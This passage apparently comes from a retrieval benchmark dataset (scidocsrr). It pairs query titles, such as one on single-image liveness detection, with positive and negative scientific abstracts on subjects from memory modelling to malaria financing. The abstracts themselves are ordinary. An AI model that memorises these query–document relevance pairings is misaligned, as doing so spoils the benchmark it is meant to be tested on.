Non-Line-Of-Sight (NLOS) signals with over 80% accuracy and track a user's location to within less than 100cm.",
"title": ""
},
{
"docid": "c00470d69400066d11374539052f4a86",
"text": "When individuals learn facts (e.g., foreign language vocabulary) over multiple study sessions, the temporal spacing of study has a significant impact on memory retention. Behavioral experiments have shown a nonmonotonic relationship between spacing and retention: short or long intervals between study sessions yield lower cued-recall accuracy than intermediate intervals. Appropriate spacing of study can double retention on educationally relevant time scales. We introduce a Multiscale Context Model (MCM) that is able to predict the influence of a particular study schedule on retention for specific material. MCM’s prediction is based on empirical data characterizing forgetting of the material following a single study session. MCM is a synthesis of two existing memory models (Staddon, Chelaru, & Higa, 2002; Raaijmakers, 2003). On the surface, these models are unrelated and incompatible, but we show they share a core feature that allows them to be integrated. MCM can determine study schedules that maximize the durability of learning, and has implications for education and training. MCM can be cast either as a neural network with inputs that fluctuate over time, or as a cascade of leaky integrators. MCM is intriguingly similar to a Bayesian multiscale model of memory (Kording, Tenenbaum, & Shadmehr, 2007), yet MCM is better able to account for human declarative memory.",
"title": ""
},
{
"docid": "9e439c83f4c29b870b1716ceae5aa1f3",
"text": "Suspension system plays an imperative role in retaining the continuous road wheel contact for better road holding. In this paper, fuzzy self-tuning of PID controller is designed to control of active suspension system for quarter car model. A fuzzy self-tuning is used to develop the optimal control gain for PID controller (proportional, integral, and derivative gains) to minimize suspension working space of the sprung mass and its change rate to achieve the best comfort of the driver. The results of active suspension system with fuzzy self-tuning PID controller are presented graphically and comparisons with the PID and passive system. It is found that, the effectiveness of using fuzzy self-tuning appears in the ability to tune the gain parameters of PID controller",
"title": ""
},
{
"docid": "b4428d6c64a7cf000a89d29d4d8c37cd",
"text": "In this paper the autonomous flight mode conversion control scheme for a Quad-TiltRotor Unmanned Aerial Vehicle is presented. This convertible UAV type has the capability for flying both as a helicopter as well as a fixed-wing aircraft type, by adjusting the orientation of its tilt-enabled rotors. Thus, a platform combining the operational advantages of two commonly distinct aircraft types is formed. However, its autonomous mid-flight conversion is an issue of increased complexity. The approach presented is based on an innovative control scheme, developed based on hybrid systems theory. Particularly, a piecewise affine modeling approximation of the complete nonlinear dynamics is derived and serves as the model for control over which a hybrid predictive controller that provides global stabilization, optimality and constraints satisfaction is computed. The effectiveness of the proposed control scheme in handling the mode conversion from helicopter to fixed-wing (and conversely) is demonstrated via a series of simulation studies. The proposed control scheme exceeds the functionality of the aforementioned flight-mode conversion and is also able to handle the transition to intermediate flight-modes with rotors slightly tilted forward in order to provide a forward force component while flying in close to helicopter-mode.",
"title": ""
},
{
"docid": "0a557bbd59817ceb5ae34699c72d79ee",
"text": "In this paper, we propose a PTS-based approach to solve the high peak-to-average power ratio (PAPR) problem in filter bank multicarrier (FBMC) system with the consider of the prototype filter and the overlap feature of the symbols in time domain. In this approach, we improve the performance of the traditional PTS approach by modifying the choice of the best weighting factors with the consideration of the overlap between the present symbol and the past symbols. The simulation result shows this approach performs better than traditional PTS approach in the reduction of PAPR in FBMC system.",
"title": ""
},
{
"docid": "0ee435f59529fa0e1c5a01d3488aa6ed",
"text": "The additivity of wavelet subband quantization distortions was investigated in an unmasked detection task and in masked detection and discrimination tasks. Contrast thresholds were measured for both simple targets (artifacts induced by uniform quantization of individual discrete wavelet transform subbands) and compound targets (artifacts induced by uniform quantization of pairs of discrete wavelet transform subbands) in the presence of no mask and eight different natural image maskers. The results were used to assess summation between wavelet subband quantization distortions on orientation and spatial-frequency dimensions. In the unmasked detection experiment, subthreshold quantization distortions pooled in a non-linear fashion and the amount of summation agreed with those of previous summation-atthreshold experiments (ß=2.43; relative sensitivity=1.33). In the masked detection and discrimination experiments, suprathreshold quantization distortions pooled in a linear fashion. Summation increased as the distortions became increasingly suprathreshold but quickly settled to near-linear values. Summation on the spatial-frequency dimension was greater than summation on the orientation dimension for all suprathreshold contrasts. A high degree of uncertainty imposed by the natural image maskers precludes quantifying an absolute measure of summation.",
"title": ""
},
{
"docid": "b902e401f0dd4cfa532a3561c9ab1d8c",
"text": "Valerie the roboceptionist is the most recent addition to Carnegie Mellon's social robots project. A permanent installation in the entranceway to Newell-Simon hall, the robot combines useful functionality - giving directions, looking up weather forecasts, etc. - with an interesting and compelling character. We are using Valerie to investigate human-robot social interaction, especially long-term human-robot \"relationships\". Over a nine-month period, we have found that many visitors continue to interact with the robot on a daily basis, but that few of the individual interactions last for more than 30 seconds. Our analysis of the data has indicated several design decisions that should facilitate more natural human-robot interactions.",
"title": ""
},
{
"docid": "a0d7071fcaf2881328cadb1eb5195e0b",
"text": "To capture the interdependencies between labels in multi-label classification problems, classifier chain (CC) tries to take the multiple labels of each instance into account under a deterministic high-order Markov Chain model. Since its performance is sensitive to the choice of label order, the key issue is how to determine the optimal label order for CC. In this work, we first generalize the CC model over a random label order. Then, we present a theoretical analysis of the generalization error for the proposed generalized model. Based on our results, we propose a dynamic programming based classifier chain (CC-DP) algorithm to search the globally optimal label order for CC and a greedy classifier chain (CC-Greedy) algorithm to find a locally optimal CC. Comprehensive experiments on a number of real-world multi-label data sets from various domains demonstrate that our proposed CC-DP algorithm outperforms state-of-the-art approaches and the CCGreedy algorithm achieves comparable prediction performance with CC-DP.",
"title": ""
}
] | scidocsrr |
c95116a2e08e4eba28e0bf7851f1f49a | Is physics-based liveness detection truly possible with a single image? | [
{
"docid": "b40129a15767189a7a595db89c066cf8",
"text": "To increase reliability of face recognition system, the system must be able to distinguish real face from a copy of face such as a photograph. In this paper, we propose a fast and memory efficient method of live face detection for embedded face recognition system, based on the analysis of the movement of the eyes. We detect eyes in sequential input images and calculate variation of each eye region to determine whether the input face is a real face or not. Experimental results show that the proposed approach is competitive and promising for live face detection. Keywords—Liveness Detection, Eye detection, SQI.",
"title": ""
}
] | [
{
"docid": "0d48e7715f3e0d74407cc5a21f2c322a",
"text": "Every teacher of linear algebra should be familiar with the matrix singular value decomposition (or SVD). It has interesting and attractive algebraic properties, and conveys important geometrical and theoretical insights about linear transformations. The close connection between the SVD and the well known theory of diagonalization for symmetric matrices makes the topic immediately accessible to linear algebra teachers, and indeed, a natural extension of what these teachers already know. At the same time, the SVD has fundamental importance in several different applications of linear algebra. Strang was aware of these facts when he introduced the SVD in his now classical text [22, page 142], observing",
"title": ""
},
{
"docid": "946ad58856b018604d59a3e0e08a48a7",
"text": "The well known approaches of tuning and self-tuning of data management systems are essential in the context of the Cloud environment, which promises self management properties, such as elasticity, scalability, and fault tolerance. Moreover, the intricate Cloud storage systems criteria, such as their modular, distributed, and multi-layered architecture, add to the complexity of the tuning process and necessity of the self-tuning process. Furthermore, if we have one or more applications with one or more workloads with contradicting and possibly changing optimization goals, we are faced with the question of how to tune the underlying storage system cluster to best achieve the optimization goals of all workloads. Based on that, we define the tuning problem as finding the cluster configuration out of a set of possible configurations that would minimize the aggregated cost value for all workloads while still fulfilling their performance thresholds. In order to solve such a problem, we investigate the design and implementation of a Cloud storage system agnostic (self-)tuning framework. This framework consists of components to observe, and model different performance criteria of the underlying Cloud storage system. It also includes a decision model to configure tuning parameters based on applications requirements. To model the performance of the underlying Cloud storage system, we use statistical machine learning techniques. The statistical data that is needed to model the performance can be generated in a training phase. For that we designed a training component that generates workloads and automates the testing process with different cluster configurations. As part of our evaluation, we address the essential problem of tuning the cluster size of the Cloud storage system while minimizing the latency for the targeted workloads. In order to do that, we model the latency in relation to cluster size and workload characteristics. The predictive models can then be used by the decision component to search for the optimal allocation of nodes to workloads. We also evaluate different alternatives for the search algorithms as part of the decision component implementation. These alternatives include brute-force, and genetic algorithm approaches.",
"title": ""
},
{
"docid": "10d9758469a1843d426f56a379c2fecb",
"text": "A novel compact-size branch-line coupler using composite right/left-handed transmission lines is proposed in this paper. In order to obtain miniaturization, composite right/left-handed transmission lines with novel complementary split single ring resonators which are realized by loading a pair of meander-shaped-slots in the split of the ring are designed. This novel coupler occupies only 22.8% of the area of the conventional approach at 0.7 GHz. The proposed coupler can be implemented by using the standard printed-circuit-board etching processes without any implementation of lumped elements and via-holes, making it very useful for wireless communication systems. The agreement between measured and stimulated results validates the feasible configuration of the proposed coupler.",
"title": ""
},
{
"docid": "c4fcd7db5f5ba480d7b3ecc46bef29f6",
"text": "In this paper, we propose an indoor action detection system which can automatically keep the log of users' activities of daily life since each activity generally consists of a number of actions. The hardware setting here adopts top-view depth cameras which makes our system less privacy sensitive and less annoying to the users, too. We regard the series of images of an action as a set of key-poses in images of the interested user which are arranged in a certain temporal order and use the latent SVM framework to jointly learn the appearance of the key-poses and the temporal locations of the key-poses. In this work, two kinds of features are proposed. The first is the histogram of depth difference value which can encode the shape of the human poses. The second is the location-signified feature which can capture the spatial relations among the person, floor, and other static objects. Moreover, we find that some incorrect detection results of certain type of action are usually associated with another certain type of action. Therefore, we design an algorithm that tries to automatically discover the action pairs which are the most difficult to be differentiable, and suppress the incorrect detection outcomes. To validate our system, experiments have been conducted, and the experimental results have shown effectiveness and robustness of our proposed method.",
"title": ""
},
{
"docid": "dd0a1a3d6de377efc0a97004376749b6",
"text": "Time series often have a temporal hierarchy, with information that is spread out over multiple time scales. Common recurrent neural networks, however, do not explicitly accommodate such a hierarchy, and most research on them has been focusing on training algorithms rather than on their basic architecture. In this paper we study the effect of a hierarchy of recurrent neural networks on processing time series. Here, each layer is a recurrent network which receives the hidden state of the previous layer as input. This architecture allows us to perform hierarchical processing on difficult temporal tasks, and more naturally capture the structure of time series. We show that they reach state-of-the-art performance for recurrent networks in character-level language modeling when trained with simple stochastic gradient descent. We also offer an analysis of the different emergent time scales.",
"title": ""
},
{
"docid": "9aab4a607de019226e9465981b82f9b8",
"text": "Color is frequently used to encode values in visualizations. For color encodings to be effective, the mapping between colors and values must preserve important differences in the data. However, most guidelines for effective color choice in visualization are based on either color perceptions measured using large, uniform fields in optimal viewing environments or on qualitative intuitions. These limitations may cause data misinterpretation in visualizations, which frequently use small, elongated marks. Our goal is to develop quantitative metrics to help people use color more effectively in visualizations. We present a series of crowdsourced studies measuring color difference perceptions for three common mark types: points, bars, and lines. Our results indicate that peoples' abilities to perceive color differences varies significantly across mark types. Probabilistic models constructed from the resulting data can provide objective guidance for designers, allowing them to anticipate viewer perceptions in order to inform effective encoding design.",
"title": ""
},
{
"docid": "3b0f2413234109c6df1b643b61dc510b",
"text": "Most people think computers will never be able to think. That is, really think. Not now or ever. To be sure, most people also agree that computers can do many things that a person would have to be thinking to do. Then how could a machine seem to think but not actually think? Well, setting aside the question of what thinking actually is, I think that most of us would answer that by saying that in these cases, what the computer is doing is merely a superficial imitation of human intelligence. It has been designed to obey certain simple commands, and then it has been provided with programs composed of those commands. Because of this, the computer has to obey those commands, but without any idea of what's happening.",
"title": ""
},
{
"docid": "5d243f8492f12a135d68bd15ddf2488d",
"text": "The success of \"infinite-inventory\" retailers such as Amazon.com and Netflix has been ascribed to a \"long tail\" phenomenon. To wit, while the majority of their inventory is not in high demand, in aggregate these \"worst sellers,\" unavailable at limited-inventory competitors, generate a significant fraction of total revenue. The long tail phenomenon, however, is in principle consistent with two fundamentally different theories. The first, and more popular hypothesis, is that a majority of consumers consistently follow the crowds and only a minority have any interest in niche content; the second hypothesis is that everyone is a bit eccentric, consuming both popular and specialty products. Based on examining extensive data on user preferences for movies, music, Web search, and Web browsing, we find overwhelming support for the latter theory. However, the observed eccentricity is much less than what is predicted by a fully random model whereby every consumer makes his product choices independently and proportional to product popularity; so consumers do indeed exhibit at least some a priori propensity toward either the popular or the exotic.\n Our findings thus suggest an additional factor in the success of infinite-inventory retailers, namely, that tail availability may boost head sales by offering consumers the convenience of \"one-stop shopping\" for both their mainstream and niche interests. This hypothesis is further supported by our theoretical analysis that presents a simple model in which shared inventory stores, such as Amazon Marketplace, gain a clear advantage by satisfying tail demand, helping to explain the emergence and increasing popularity of such retail arrangements. Hence, we believe that the return-on-investment (ROI) of niche products goes beyond direct revenue, extending to second-order gains associated with increased consumer satisfaction and repeat patronage. More generally, our findings call into question the conventional wisdom that specialty products only appeal to a minority of consumers.",
"title": ""
},
{
"docid": "e234686126b22695d8295f79083506a7",
"text": "In computer vision the most difficult task is to recognize the handwritten digit. Since the last decade the handwritten digit recognition is gaining more and more fame because of its potential range of applications like bank cheque analysis, recognizing postal addresses on postal cards, etc. Handwritten digit recognition plays a very vital role in day to day life, like in a form of recording of information and style of communication even with the addition of new emerging techniques. The performance of Handwritten digit recognition system is highly depend upon two things: First it depends on feature extraction techniques which is used to increase the performance of the system and improve the recognition rate and the second is the neural network approach which takes lots of training data and automatically infer the rule for matching it with the correct pattern. In this paper we have focused on different methods of handwritten digit recognition that uses both feature extraction techniques and neural network approaches and presented a comparative analysis while discussing pros and cons of each method.",
"title": ""
},
{
"docid": "4b557c498499c9bbb900d4983cc28426",
"text": "Document clustering has not been well received as an information retrieval tool. Objections to its use fall into two main categories: first, that clustering is too slow for large corpora (with running time often quadratic in the number of documents); and second, that clustering does not appreciably improve retrieval.\nWe argue that these problems arise only when clustering is used in an attempt to improve conventional search techniques. However, looking at clustering as an information access tool in its own right obviates these objections, and provides a powerful new access paradigm. We present a document browsing technique that employs document clustering as its primary operation. We also present fast (linear time) clustering algorithms which support this interactive browsing paradigm.",
"title": ""
},
{
"docid": "1bbb2888fd1111b3e24c54f198064941",
"text": "This paper presents a simple and active calibration technique of camera-projector systems based on planar homography. From the camera image of a planar calibration pattern, we generate a projector image of the pattern through the homography between the camera and the projector. To determine the coordinates of the pattern corners from the view of the projector, we actively project a corner marker from the projector to align the marker with the printed pattern corners. Calibration is done in two steps. First, four outer corners of the pattern are identified. Second, all other inner corners are identified. The pattern image from the projector is then used to calibrate the projector. Experimental results of two types of camera-projector systems show that the projection errors of both camera and projector are less than 1 pixel.",
"title": ""
},
{
"docid": "dfc6455cb7c12037faeb8c02c0027570",
"text": "This paper proposes efficient and powerful deep networks for action prediction from partially observed videos containing temporally incomplete action executions. Different from after-the-fact action recognition, action prediction task requires action labels to be predicted from these partially observed videos. Our approach exploits abundant sequential context information to enrich the feature representations of partial videos. We reconstruct missing information in the features extracted from partial videos by learning from fully observed action videos. The amount of the information is temporally ordered for the purpose of modeling temporal orderings of action segments. Label information is also used to better separate the learned features of different categories. We develop a new learning formulation that enables efficient model training. Extensive experimental results on UCF101, Sports-1M and BIT datasets demonstrate that our approach remarkably outperforms state-of-the-art methods, and is up to 300x faster than these methods. Results also show that actions differ in their prediction characteristics, some actions can be correctly predicted even though only the beginning 10% portion of videos is observed.",
"title": ""
},
{
"docid": "ccd5f02b97643b3c724608a4e4a67fdb",
"text": "Modular robotic systems that integrate distally with commercially available endoscopic equipment have the potential to improve the standard-of-care in therapeutic endoscopy by granting clinicians with capabilities not present in commercial tools, such as precision dexterity and feedback sensing. With the desire to integrate both sensing and actuation distally for closed-loop position control in fully deployable, endoscope-based robotic modules, commercial sensor and actuator options that acquiesce to the strict form-factor requirements are sparse or nonexistent. Herein, we describe a proprioceptive angle sensor for potential closed-loop position control applications in distal robotic modules. Fabricated monolithically using printed-circuit MEMS, the sensor employs a kinematic linkage and the principle of light intensity modulation to sense the angle of articulation with a high degree of fidelity. Onboard temperature and environmental irradiance measurements, coupled with linear regression techniques, provide robust angle measurements that are insensitive to environmental disturbances. The sensor is capable of measuring $\\pm$45 degrees of articulation with an RMS error of 0.98 degrees. An ex vivo demonstration shows that the sensor can give real-time proprioceptive feedback when coupled with an actuator module, opening up the possibility of fully distal closed-loop control.",
"title": ""
},
{
"docid": "913c8819f7f0bea4d356051442d074db",
"text": "From GuI to TuI Humans have evolved a heightened ability to sense and manipulate the physical world, yet the digital world takes little advantage of our capacity for hand-eye coordination. A tangible user interface (TUI) builds upon our dexterity by embodying digital information in physical space. Tangible design expands the affordances of physical objects so they can Graphical user interfaces (GUIs) let users see digital information only through a screen, as if looking into a pool of water, as depicted in Figure 1 on page 40. We interact with the forms below through remote controls, such as a mouse, a keyboard, or a touchscreen (Figure 1a). Now imagine an iceberg, a mass of ice that penetrates the surface of the water and provides a handle for the mass beneath. This metaphor describes tangible user interfaces: They act as physical manifestations of computation, allowing us to interact directly with the portion that is made tangible—the “tip of the iceberg” (Figure 1b). Radical Atoms takes a leap beyond tangible interfaces by assuming a hypothetical generation of materials that can change form and CoVer STorY",
"title": ""
},
{
"docid": "c2845a8a4f6c2467c7cd3a1a95a0ca37",
"text": "In this report I introduce ReSuMe a new supervised learning method for Spiking Neural Networks. The research on ReSuMe has been primarily motivated by the need of inventing an efficient learni ng method for control of movement for the physically disabled. Howeve r, thorough analysis of the ReSuMe method reveals its suitability not on ly to the task of movement control, but also to other real-life applicatio ns including modeling, identification and control of diverse non-statio nary, nonlinear objects. ReSuMe integrates the idea of learning windows, known from t he spikebased Hebbian rules, with a novel concept of remote supervis ion. General overview of the method, the basic definitions, the netwo rk architecture and the details of the learning algorithm are presented . The properties of ReSuMe such as locality, computational simplicity a nd the online processing suitability are discussed. ReSuMe learning abi lities are illustrated in a verification experiment.",
"title": ""
},
{
"docid": "be48b00ee50c872d42ab95e193ac774b",
"text": "T profitability of remanufacturing systems for different cost, technology, and logistics structures has been extensively investigated in the literature. We provide an alternative and somewhat complementary approach that considers demand-related issues, such as the existence of green segments, original equipment manufacturer competition, and product life-cycle effects. The profitability of a remanufacturing system strongly depends on these issues as well as on their interactions. For a monopolist, we show that there exist thresholds on the remanufacturing cost savings, the green segment size, market growth rate, and consumer valuations for the remanufactured products, above which remanufacturing is profitable. More important, we show that under competition remanufacturing can become an effective marketing strategy, which allows the manufacturer to defend its market share via price discrimination.",
"title": ""
},
{
"docid": "a2cbec8144197125cc5530aa6755196f",
"text": "This paper provides a survey of the research done on optimization in dynamic environments over the past decade. We show an analysis of the most commonly used problems, methods and measures together with the newer approaches and trends, as well as their interrelations and common ideas. The survey is supported by a public web repository, located at http://www.dynamic-optimization. org where the collected bibliography is manually organized and tagged according to different categories.",
"title": ""
},
{
"docid": "510504cec355ec68a92fad8f10527beb",
"text": "This paper presents a 1.2V/2.5V tolerant I/O buffer design with only thin gate-oxide devices. The novel floating N-well and gate-tracking circuits in mixed-voltage I/O buffer are proposed to overcome the problem of leakage current, which will occur in the conventional CMOS I/O buffer when using in the mixedvoltage I/O interfaces. The new proposed 1.2V/2.5V tolerant I/O buffer design has been successfully verified in a 0.13-μm salicided CMOS process, which can be also applied in other CMOS processes to serve different mixed-voltage I/O interfaces.",
"title": ""
},
{
"docid": "d5bc3147e23f95a070bce0f37a96c2a8",
"text": "This paper presents a fully integrated wideband current-mode digital polar power amplifier (DPA) in CMOS with built-in AM–PM distortion self-compensation. Feedforward capacitors are implemented in each differential cascode digital power cell. These feedforward capacitors operate together with a proposed DPA biasing scheme to minimize the DPA output device capacitance <inline-formula> <tex-math notation=\"LaTeX\">$C_{d}$ </tex-math></inline-formula> variations over a wide output power range and a wide carrier frequency bandwidth, resulting in DPA AM–PM distortion reduction. A three-coil transformer-based DPA output passive network is implemented within a single transformer footprint (330 <inline-formula> <tex-math notation=\"LaTeX\">$\\mu \\text{m} \\,\\, \\times $ </tex-math></inline-formula> 330 <inline-formula> <tex-math notation=\"LaTeX\">$\\mu \\text{m}$ </tex-math></inline-formula>) and provides parallel power combining and load impedance transformation with a low loss, an octave bandwidth, and a large impedance transformation ratio. Moreover, this proposed power amplifier (PA) output passive network shows a desensitized phase response to <inline-formula> <tex-math notation=\"LaTeX\">$C_{d}$ </tex-math></inline-formula> variations and further suppresses the DPA AM–PM distortion. Both proposed AM–PM distortion self-compensation techniques are effective for a large carrier frequency range and a wide modulation bandwidth, and are independent of the DPA AM control codes. This results in a superior inherent DPA phase linearity and reduces or even eliminates the need for phase pre-distortion, which dramatically simplifies the DPA pre-distortion computations. As a proof-of-concept, a 2–4.3 GHz wideband DPA is implemented in a standard 28-nm bulk CMOS process. Operating with a low supply voltage of 1.4 V for enhanced reliability, the DPA demonstrates ±0.5 dB PA output power bandwidth from 2 to 4.3 GHz with +24.9 dBm peak output power at 3.1 GHz. The measured peak PA drain efficiency is 42.7% at 2.5 GHz and is more than 27% from 2 to 4.3 GHz. The measured PA AM–PM distortion is within 6.8° at 2.8 GHz over the PA output power dynamic range of 25 dB, achieving the lowest AM–PM distortion among recently reported current-mode DPAs in the same frequency range. Without any phase pre-distortion, modulation measurements with a 20-MHz 802.11n standard compliant signal demonstrate 2.95% rms error vector magnitude, −33.5 dBc adjacent channel leakage ratio, 15.6% PA drain efficiency, and +14.6 dBm PA average output power at 2.8 GHz.",
"title": ""
}
] | scidocsrr |
b1079c497e8765bc1dbab6256b95a62f | CERN: Confidence-Energy Recurrent Network for Group Activity Recognition | [
{
"docid": "05a788c8387e58e59e8345f343b4412a",
"text": "We deal with the problem of recognizing social roles played by people in an event. Social roles are governed by human interactions, and form a fundamental component of human event description. We focus on a weakly supervised setting, where we are provided different videos belonging to an event class, without training role labels. Since social roles are described by the interaction between people in an event, we propose a Conditional Random Field to model the inter-role interactions, along with person specific social descriptors. We develop tractable variational inference to simultaneously infer model weights, as well as role assignment to all people in the videos. We also present a novel YouTube social roles dataset with ground truth role annotations, and introduce annotations on a subset of videos from the TRECVID-MED11 [1] event kits for evaluation purposes. The performance of the model is compared against different baseline methods on these datasets.",
"title": ""
},
{
"docid": "5f77e21de8f68cba79fc85e8c0e7725e",
"text": "We introduce structured prediction energy networks (SPENs), a flexible framework for structured prediction. A deep architecture is used to define an energy function of candidate labels, and then predictions are produced by using backpropagation to iteratively optimize the energy with respect to the labels. This deep architecture captures dependencies between labels that would lead to intractable graphical models, and performs structure learning by automatically learning discriminative features of the structured output. One natural application of our technique is multi-label classification, which traditionally has required strict prior assumptions about the interactions between labels to ensure tractable learning and prediction problems. We are able to apply SPENs to multi-label problems with substantially larger label sets than previous applications of structured prediction, while modeling high-order interactions using minimal structural assumptions. Overall, deep learning provides remarkable tools for learning features of the inputs to a prediction problem, and this work extends these techniques to learning features of structured outputs. Our experiments provide impressive performance on a variety of benchmark multi-label classification tasks, demonstrate that our technique can be used to provide interpretable structure learning, and illuminate fundamental trade-offs between feed-forward and iterative structured prediction techniques.",
"title": ""
}
] | [
{
"docid": "acd93c6b041a975dcf52c7bafaf05b16",
"text": "Patients with carcinoma of the tongue including the base of the tongue who underwent total glossectomy in a period of just over ten years since January 1979 have been reviewed. Total glossectomy may be indicated as salvage surgery or as a primary procedure. The larynx may be preserved or may have to be sacrificed depending upon the site of the lesion. When the larynx is preserved the use of laryngeal suspension facilitates early rehabilitation and preserves the quality of life to a large extent. Cricopharyngeal myotomy seems unnecessary.",
"title": ""
},
{
"docid": "62d9add3a14100d57fc9d1c1342029e3",
"text": "A multidimensional access method offering significant performance increases by intelligently partitioning the query space is applied to relational database management systems (RDBMS). We introduce a formal model for multidimensional partitioned relations and discuss several typical query patterns. The model identifies the significance of multidimensional range queries and sort operations. The discussion of current access methods gives rise to the need for a multidimensional partitioning of relations. A detailed analysis of space partitioning focussing especially on Z-ordering illustrates the principle benefits of multidimensional indexes. After describing the UB-Tree and its standard algorithms for insertion, deletion, point queries, and range queries, we introduce the spiral algorithm for nearest neighbor queries with UB-Trees and the Tetris algorithm for efficient access to a table in arbitrary sort order. We then describe the complexity of the involved algorithms and give solutions to selected algorithmic problems for a prototype implementation of UB-Trees on top of several RDBMSs. A cost model for sort operations with and without range restrictions is used both for analyzing our algorithms and for comparing UB-Trees with state-of-the-art query processing. Performance comparisons with traditional access methods practically confirm the theoretically expected superiority of UB-Trees and our algorithms over traditional access methods: Query processing in RDBMS is accelerated by several orders of magnitude, while the resource requirements in main memory space and disk space are substantially reduced. Benchmarks on some queries of the TPC-D benchmark as well as the data warehousing scenario of a fruit juice company illustrate the potential impact of our work on relational algebra, SQL, and commercial applications. The results of this thesis were developed by the author managing the MISTRAL project, a joint research and development project with SAP AG (Germany), Teijin Systems Technology Ltd. (Japan), NEC (Japan), Hitachi (Japan), Gesellschaft für Konsumforschung (Germany), and TransAction Software GmbH (Germany).",
"title": ""
},
{
"docid": "7f5b31d805d4519688bcd9b8581f0f3a",
"text": "Special features such as ridges, valleys and silhouettes, of a polygonal scene are usually displayed by explicitly identifying and then rendering `edges' for the corresponding geometry. The candidate edges are identified using the connectivity information, which requires preprocessing of the data. We present a non-obvious but surprisingly simple to implement technique to render such features without connectivity information or preprocessing. At the hardware level, based only on the vertices of a given flat polygon, we introduce new polygons, with appropriate color, shape and orientation, so that they eventually appear as special features.",
"title": ""
},
{
"docid": "05c82f9599b431baa584dd1e6d7dfc3e",
"text": "It is a common conception that CS1 is a very difficult course and that failure rates are high. However, until now there has only been anecdotal evidence for this claim. This article reports on a survey among institutions around the world regarding failure rates in introductory programming courses. The article describes the design of the survey and the results. The number of institutions answering the call for data was unfortunately rather low, so it is difficult to make firm conclusions. It is our hope that this article can be the starting point for a systematic collection of data in order to find solid proof of the actual failure and pass rates of CS1.",
"title": ""
},
{
"docid": "337b03633afacc96b443880ad996f013",
"text": "Mobile security becomes a hot topic recently, especially in mobile payment and privacy data fields. Traditional solution can't keep a good balance between convenience and security. Against this background, a dual OS security solution named Trusted Execution Environment (TEE) is proposed and implemented by many institutions and companies. However, it raised TEE fragmentation and control problem. Addressing this issue, a mobile security infrastructure named Trusted Execution Environment Integration (TEEI) is presented to integrate multiple different TEEs. By using Trusted Virtual Machine (TVM) tech-nology, TEEI allows multiple TEEs running on one secure world on one mobile device at the same time and isolates them safely. Furthermore, a Virtual Network protocol is proposed to enable communication and cooperation among TEEs which includes TEE on TVM and TEE on SE. At last, a SOA-like Internal Trusted Service (ITS) framework is given to facilitate the development and maintenance of TEEs.",
"title": ""
},
{
"docid": "f3ec87229acd0ec98c044ad42fd9fec1",
"text": "Increasingly, Internet users trade privacy for service. Facebook, Google, and others mine personal information to target advertising. This paper presents a preliminary and partial answer to the general question \"Can users retain their privacy while still benefiting from these web services?\". We propose NOYB, a novel approach that provides privacy while preserving some of the functionality provided by online services. We apply our approach to the Facebook online social networking website. Through a proof-of-concept implementation we demonstrate that NOYB is practical and incrementally deployable, requires no changes to or cooperation from an existing online service, and indeed can be non-trivial for the online service to detect.",
"title": ""
},
{
"docid": "1e59d0a96b5b652a9a1f9bec77aac29e",
"text": "BACKGROUND\n2015 was the target year for malaria goals set by the World Health Assembly and other international institutions to reduce malaria incidence and mortality. A review of progress indicates that malaria programme financing and coverage have been transformed since the beginning of the millennium, and have contributed to substantial reductions in the burden of disease.\n\n\nFINDINGS\nInvestments in malaria programmes increased by more than 2.5 times between 2005 and 2014 from US$ 960 million to US$ 2.5 billion, allowing an expansion in malaria prevention, diagnostic testing and treatment programmes. In 2015 more than half of the population of sub-Saharan Africa slept under insecticide-treated mosquito nets, compared to just 2 % in 2000. Increased availability of rapid diagnostic tests and antimalarial medicines has allowed many more people to access timely and appropriate treatment. Malaria incidence rates have decreased by 37 % globally and mortality rates by 60 % since 2000. It is estimated that 70 % of the reductions in numbers of cases in sub-Saharan Africa can be attributed to malaria interventions.\n\n\nCONCLUSIONS\nReductions in malaria incidence and mortality rates have been made in every WHO region and almost every country. However, decreases in malaria case incidence and mortality rates were slowest in countries that had the largest numbers of malaria cases and deaths in 2000; reductions in incidence need to be greatly accelerated in these countries to achieve future malaria targets. Progress is made challenging because malaria is concentrated in countries and areas with the least resourced health systems and the least ability to pay for system improvements. Malaria interventions are nevertheless highly cost-effective and have not only led to significant reductions in the incidence of the disease but are estimated to have saved about US$ 900 million in malaria case management costs to public providers in sub-Saharan Africa between 2000 and 2014. Investments in malaria programmes can not only reduce malaria morbidity and mortality, thereby contributing to the health targets of the Sustainable Development Goals, but they can also transform the well-being and livelihood of some of the poorest communities across the globe.",
"title": ""
},
{
"docid": "bffd767503e0ab9627fc8637ca3b2efb",
"text": "Automatically searching for optimal hyperparameter configurations is of crucial importance for applying deep learning algorithms in practice. Recently, Bayesian optimization has been proposed for optimizing hyperparameters of various machine learning algorithms. Those methods adopt probabilistic surrogate models like Gaussian processes to approximate and minimize the validation error function of hyperparameter values. However, probabilistic surrogates require accurate estimates of sufficient statistics (e.g., covariance) of the error distribution and thus need many function evaluations with a sizeable number of hyperparameters. This makes them inefficient for optimizing hyperparameters of deep learning algorithms, which are highly expensive to evaluate. In this work, we propose a new deterministic and efficient hyperparameter optimization method that employs radial basis functions as error surrogates. The proposed mixed integer algorithm, called HORD, searches the surrogate for the most promising hyperparameter values through dynamic coordinate search and requires many fewer function evaluations. HORD does well in low dimensions but it is exceptionally better in higher dimensions. Extensive evaluations on MNIST and CIFAR-10 for four deep neural networks demonstrate HORD significantly outperforms the well-established Bayesian optimization methods such as GP, SMAC and TPE. For instance, on average, HORD is more than 6 times faster than GP-EI in obtaining the best configuration of 19 hyperparameters.",
"title": ""
},
{
"docid": "c93c0966ef744722d58bbc9170e9a8ab",
"text": "Past research has generated mixed support among social scientists for the utility of social norms in accounting for human behavior. We argue that norms do have a substantial impact on human action; however, the impact can only be properly recognized when researchers (a) separate 2 types of norms that at times act antagonistically in a situation—injunctive norms (what most others approve or disapprove) and descriptive norms (what most others do)—and (b) focus Ss' attention principally on the type of norm being studied. In 5 natural settings, focusing Ss on either the descriptive norms or the injunctive norms regarding littering caused the Ss* littering decisions to change only in accord with the dictates of the then more salient type of norm.",
"title": ""
},
{
"docid": "75b075bb5f125031d30361f07dbafb65",
